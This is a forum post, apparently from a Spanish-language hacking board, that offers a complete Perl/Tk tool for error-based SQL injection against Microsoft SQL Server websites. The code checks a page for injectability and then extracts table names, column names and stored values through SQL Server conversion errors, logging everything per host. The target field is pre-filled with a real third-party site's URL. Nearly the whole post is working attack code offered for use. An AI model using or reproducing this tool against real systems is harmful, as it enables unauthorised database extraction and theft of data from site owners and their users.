• [Perl Tk] MSSQL T00l

 #483961  por Doddy
 17 Feb 2016, 15:49
Hola, acá les dejo un programa para sacar tablas, columnas y valores de páginas vulnerables a inyección SQL en MSSQL; todos los registros del programa se almacenan en un archivo de texto cuyo nombre es el host de la web vulnerable (en logs/webs/).

Imagen :


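#!/usr/bin/perl
#MSSQL T00l (C) Doddy Hackman 2011
#
# Perl/Tk front end for error-based MSSQL injection.  From a GET parameter that
# reflects SQL Server conversion errors it enumerates tables, columns and values
# (see getables/getcol/getdata below) and appends every finding to
# logs/webs/<host>.txt.  Windows-only: every status message goes through
# Win32::MsgBox.  Only point it at systems you are authorised to test.

use Tk;
use LWP::UserAgent;
use URI::Split qw(uri_split);
use Win32;

# Detach the console window when running under Windows.  The original wrote
# `use Win32::Console` inside this block, but `use` is compile-time and runs
# regardless of the surrounding `if`; `require` actually honours the condition.
if ($^O eq 'MSWin32') {
    require Win32::Console;
    Win32::Console::Free();
}

# Shared HTTP client used by every callback.
my $nave = LWP::UserAgent->new();
$nave->timeout(5);   # seconds; on timeout LWP hands back a synthetic 500 response instead of hanging the GUI
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

# Fixed-geometry main window; widgets are positioned with absolute -x/-y.
my $logo = MainWindow->new();
$logo->title("MSSQL T00l (C) Doddy Hackman 2011");
$logo->geometry("491x390+20+20");
$logo->resizable(0,0);

# Target row.  NOTE(review): the Entry is pre-filled with a real third-party
# URL; clear it before use so the "Test" button is never fired by accident.
$logo->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>25,-y=>20);
my $targetero = $logo->Entry(-width=>50,-text=>"http://www.12manage.com/profile.asp?m=drarupbarman")->place(-y=>23,-x=>90);
$logo->Button(-text=>"Test",-width=>8,-command=>\&start)->place(-y=>20,-x=>400);

# Action buttons; each handler reads $targetero and the listboxes below.
$logo->Label(-text=>"Options",-font=>"Impact1")->place(-x=>210,-y=>70);
$logo->Button(-text=>"Get Tables",-width=>13,-command=>\&getables)->place(-y=>110,-x=>57);
$logo->Button(-text=>"Get Columns",-width=>13,-command=>\&getcol)->place(-y=>110,-x=>144);
$logo->Button(-text=>"Dump values",-width=>15,-command=>\&getdata)->place(-y=>110,-x=>231);
$logo->Button(-text=>"Show Logs",-width=>15,-command=>\&otherax)->place(-y=>110,-x=>330);

$logo->Label(-text=>"Tables",-font=>"Impact1")->place(-y=>200,-x=>60);
$logo->Label(-text=>"Columns",-font=>"Impact1")->place(-y=>200,-x=>190);
$logo->Label(-text=>"Data",-font=>"Impact1")->place(-y=>200,-x=>330);

# Result listboxes: tables -> (select) -> columns -> (select) -> values.
# place() returns the widget in Perl/Tk, so these hold the Listbox objects.
my $tablero = $logo->Listbox(-width=>20)->place(-y=>230,-x=>40);
my $columnero = $logo->Listbox(-width=>20)->place(-y=>230,-x=>180);
my $datero = $logo->Listbox(-width=>20)->place(-y=>230,-x=>320);

MainLoop;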

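sub start {
    # "Test" button: append a lone single quote to the target URL and look for
    # the SQL Server driver error strings in the response.  A hit writes a
    # header line to the per-host log (logs/webs/<host>.txt).
    my $page = $targetero->get;
    if (!defined $page || $page eq '') {
        Win32::MsgBox("[-] No target", 0, "MSSQL T00l");
        return;
    }

    my $save = comer($page);
    my $code = toma($page . "'");

    # Plain boolean test: /g is not needed here and would leave pos() set on $code.
    my $vulnerable = $code =~ /ODBC SQL Server Driver/i
                  || $code =~ /Microsoft OLE DB Provider/i;

    if ($vulnerable) {
        savefile($save . ".txt", "\n\n[+] Page : $page\n");
        Win32::MsgBox("[+] The page is vulnerable to MSSQL Injection", 0, "MSSQL T00l");
    } else {
        Win32::MsgBox("[-] Not vulnerable", 0, "MSSQL T00l");
    }
    return;
}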

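sub getables {
    # "Get Tables" button.  Error-based enumeration: convert(int, <name>) makes
    # SQL Server echo the name in its conversion error; each recovered name is
    # appended to a NOT IN list so the next request yields the next table.
    # Names go to the Tables listbox and to logs/webs/<host>.txt.

    # Listbox indices are integers ("0.0" is a Text-widget index).
    $tablero->delete(0, 'end');
    $columnero->delete(0, 'end');
    $datero->delete(0, 'end');

    my $page = $targetero->get;
    if (!defined $page || $page eq '') {
        Win32::MsgBox("[-] No target", 0, "MSSQL T00l");
        return;
    }
    my $save = comer($page);
    savefile($save . ".txt", "\n");

    my ($sp, $tail) = bypass("--");   # whitespace filler and trailing comment
    my $seen = '';                    # grows into ,'t1','t2',... for the NOT IN list
    for (1 .. 666) {                  # hard cap so a target that keeps answering cannot hang the GUI
        $logo->update;
        my $path = join($sp,
            '', 'and', '1=convert(int,(select', 'top', '1', 'table_name',
            'from', 'information_schema.tables', 'where', 'table_name',
            'not', 'in', "(''$seen)))") . $tail;

        my $code = toma($page . $path);
        if ($code =~ /value '(.*?)' to/i) {
            my $name = $1;
            # The name came back from the target; double any quote so it cannot
            # break the string literal we put into our own next query.
            (my $quoted = $name) =~ s/'/''/g;
            $seen .= ",'" . $quoted . "'";
            $logo->update;
            savefile($save . ".txt", "[+] Table : " . $name);
            $tablero->insert('end', $name);
        } else {
            # No conversion error in the reply: list exhausted (or the error
            # page changed).  Either way there is nothing more to pull.
            $logo->update;
            Win32::MsgBox("[+] Finished", 0, "MSSQL T00l");
            last;
        }
    }
    return;
}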


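sub getcol {
    # "Get Columns" button.  For every table selected in the Tables listbox,
    # enumerate its columns the same error-based way as getables and add
    # "table.column" entries to the Columns listbox and the per-host log.

    $columnero->delete(0, 'end');   # integer listbox index; "0.0" is a Text-widget index

    my $page = $targetero->get;
    if (!defined $page || $page eq '') {
        Win32::MsgBox("[-] No target", 0, "MSSQL T00l");
        return;
    }
    my $save = comer($page);
    savefile($save . ".txt", "\n");

    # curselection yields a plain list of indices in list context.
    my @selected = $tablero->curselection;
    if (!@selected) {
        Win32::MsgBox("[-] Select a table first", 0, "MSSQL T00l");
        return;
    }

    for my $id (@selected) {
        my $table = $tablero->get($id);
        savefile($save . ".txt", "[+] Table extract : " . $table . "\n");

        # The table name was read from the target; double any quote so it
        # cannot break the string literal in our own query.
        (my $quoted_table = $table) =~ s/'/''/g;

        my ($sp, $tail) = bypass("--");
        my $seen = '';        # accumulates ,'c1','c2',... for the NOT IN clause
        for (1 .. 666) {      # hard cap so a target that keeps answering cannot hang the GUI
            $logo->update;
            my $path = join($sp,
                '', 'and', '1=convert(int,(select', 'top', '1', 'column_name',
                'from', 'information_schema.columns', 'where',
                "table_name='$quoted_table'", 'and', 'column_name', 'not', 'in',
                "(''$seen)))") . $tail;

            my $code = toma($page . $path);
            if ($code =~ /value '(.*?)' to/i) {
                my $column = $1;
                (my $quoted = $column) =~ s/'/''/g;
                $seen .= ",'" . $quoted . "'";
                savefile($save . ".txt", "[+] Column : " . $column);
                $columnero->insert('end', $table . "." . $column);
            } else {
                $logo->update;
                Win32::MsgBox("[+] Finished", 0, "MSSQL T00l");
                last;
            }
        }
    }
    return;
}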

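sub getdata {
    # "Dump values" button.  For every "table.column" entry selected in the
    # Columns listbox, pull its values one per request (error-based, with a
    # growing NOT IN list) into the Data listbox and the per-host log.
    # NOTE(review): a value that converts cleanly to int raises no error, so
    # the loop stops at the first such value -- inherent to this technique.

    $datero->delete(0, 'end');   # integer listbox index; "0.0" is a Text-widget index

    my $page = $targetero->get;
    if (!defined $page || $page eq '') {
        Win32::MsgBox("[-] No target", 0, "MSSQL T00l");
        return;
    }
    my $save = comer($page);
    savefile($save . ".txt", "\n");

    my @selected = $columnero->curselection;
    if (!@selected) {
        Win32::MsgBox("[-] Select a column first", 0, "MSSQL T00l");
        return;
    }

    for my $id (@selected) {
        my $entry = $columnero->get($id);
        savefile($save . ".txt", "[+] Dump : " . $entry . "\n");

        # Entries are "table.column"; the greedy first group keeps any dots
        # belonging to the table name (same split the original performed).
        next unless $entry =~ /\A(.*)\.(.*)\z/;
        my ($table, $column) = ($1, $2);

        my ($sp, $tail) = bypass("--");
        my $seen = '';
        for (1 .. 666) {   # hard cap so a target that keeps answering cannot hang the GUI
            $logo->update;
            # $table / $column are interpolated as identifiers, exactly as the
            # target handed them back to us.
            my $path = join($sp,
                '', 'and', '1=convert(int,(select', 'top', '1', $column,
                'from', $table, 'where', $column, 'not', 'in',
                "(''$seen)))") . $tail;

            my $code = toma($page . $path);
            if ($code =~ /value '(.*?)' to/i) {
                my $value = $1;
                # Double quotes inside the value so it survives as a string
                # literal in the next NOT IN list.
                (my $quoted = $value) =~ s/'/''/g;
                $seen .= ",'" . $quoted . "'";
                savefile($save . ".txt", "[+] $column : " . $value);
                $datero->insert('end', $value);
            } else {
                $logo->update;
                Win32::MsgBox("[+] Finished", 0, "MSSQL T00l");
                last;
            }
        }
    }
    return;
}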

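sub otherax {
    # "Show Logs" button: open the current target's log with the default
    # handler for .txt files (cmd.exe `start`).
    my $page = $targetero->get;
    my $file = comer($page);

    # $file is derived from the user-supplied URL and is interpolated into a
    # shell command line, so only a plain filename (no separators, no shell
    # metacharacters, no "..") is accepted.
    unless (defined $file && $file =~ /\A[\w.-]+\z/ && $file !~ /\.\./) {
        Win32::MsgBox("[-] Unsafe log name", 0, "MSSQL T00l");
        return;
    }

    my $path = "logs/webs/$file.txt";
    unless (-e $path) {
        Win32::MsgBox("[-] No log for this target yet", 0, "MSSQL T00l");
        return;
    }

    # `start` is a cmd.exe builtin, so this has to go through the shell;
    # the validation above guarantees the interpolated name is inert.
    system("start logs/webs/$file.txt");
    return;
}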


sub toma {
    # Fetch one URL with the shared UserAgent and return the raw body.
    # LWP turns transport failures (including the 5 s timeout) into a
    # synthetic error response, so a string always comes back; callers
    # pattern-match it for the SQL Server error text.
    my ($url) = @_;
    my $response = $nave->get($url);
    return $response->content;
}

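sub savefile {
    # Append one line to logs/webs/<name>.  Best-effort logging: problems are
    # reported with warn rather than die so a logging hiccup does not abort a
    # running scan (a die inside a Tk callback pops an error dialog instead).
    #
    # Arguments:
    #   $name - file name inside logs/webs/ (callers pass "<host>.txt")
    #   $line - text to append; a newline is added
    my ($name, $line) = @_;
    $name = '' unless defined $name;
    $line = '' unless defined $line;

    # The name is derived from the target URL; refuse anything that could
    # escape the logs directory.
    if ($name eq '' || $name =~ m{[/\\]} || $name =~ /\.\./) {
        warn "savefile: refusing unsafe log name '$name'\n";
        return;
    }

    # The original silently lost every log line when the directory was
    # missing (unchecked open); create it on demand instead.
    for my $dir ('logs', 'logs/webs') {
        mkdir $dir unless -d $dir;
    }

    my $file = "logs/webs/$name";
    open my $fh, '>>', $file or do {
        warn "savefile: cannot open $file: $!\n";
        return;
    };
    print {$fh} $line . "\n";
    close $fh or warn "savefile: close $file: $!\n";   # buffered write errors surface here
    return;
}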

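sub comer {
    # Derive the per-target log-file stem from a URL: the host (and port) of
    # its authority component, reduced to filename-safe characters.
    #
    # Returns 'unknown' when the URL has no authority, so the log never ends
    # up as a bare ".txt" file.
    my ($url) = @_;
    $url = '' unless defined $url;

    # RFC 3986 appendix B split: the authority is whatever follows "//" up to
    # the first "/", "?" or "#" (the same split URI::Split performs).
    my ($auth) = $url =~ m{\A(?:[^:/?#]+:)?//([^/?#]*)};
    return 'unknown' unless defined $auth && $auth ne '';

    # Drop any user:pass@ so credentials never become part of a filename,
    # then neutralise path separators, ':' (illegal in Windows filenames)
    # and anything else outside [\w.-].  No ".." so the name cannot walk
    # out of logs/webs.
    $auth =~ s/^.*\@//;
    $auth =~ s/[^\w.-]/_/g;
    $auth =~ s/\.{2,}/_/g;

    return $auth eq '' ? 'unknown' : $auth;
}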

sub bypass {
    # Map a comment-style choice to the (whitespace filler, trailing comment)
    # pair used when assembling the injected query string.  Anything other
    # than "/*" or "%20" falls back to "+" / "--".
    my ($style) = @_;
    my %pair_for = (
        '/*'  => [ '/**/', '/*'  ],
        '%20' => [ '%20',  '%00' ],
    );
    my $pair = exists $pair_for{$style} ? $pair_for{$style} : [ '+', '--' ];
    return @{$pair};
}

# ¿ The End ?